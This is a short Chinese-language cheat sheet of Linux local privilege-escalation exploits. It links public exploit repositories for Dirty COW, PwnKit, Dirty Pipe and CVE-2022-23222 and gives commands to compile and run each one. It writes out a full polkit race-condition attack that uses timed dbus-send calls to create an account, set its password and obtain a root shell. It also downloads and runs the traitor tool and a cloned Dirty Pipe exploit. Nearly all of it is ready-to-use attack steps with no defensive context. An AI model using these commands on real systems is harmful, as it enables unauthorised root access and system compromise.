https://github.com/FireFart/dirtycow
$gcc -pthread dirty.c -o dirty –lcrypt
$./dirty passwd 
生成账户密码
https://github.com/gbonacini/CVE-2016-5195
$make
$./dcow -s

https://github.com/berdav/CVE-2021-4034
只需执行make，./cve-2021-4034然后get root shell

检查执行命令所需时间
>time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1
提前结束(多运行几次)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1 & sleep 0.0035s ; kill $!
生成密码
>openssl passwd -5 ignite@123
执行(多运行几次)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'$5$F2KwiUlWkn2i8DC.$rw9AOjKsmK83DhncqehVUzOKVqq.ArwS2G8eQKVntv7' string:BestHackingTutorials & sleep 0.0035s ; kill $!
>su ignite
>password: ignite@123
>whoami
>id
>sudo bash获取root

>wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
>./traitor-amd64 --exploit kernel:CVE-2022-0847
>whoami
>id
或
>git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
>cd CVE-2022-0847-DirtyPipe-Exploit
>./compile.sh
>./exploit

https://github.com/tr3ee/CVE-2022-23222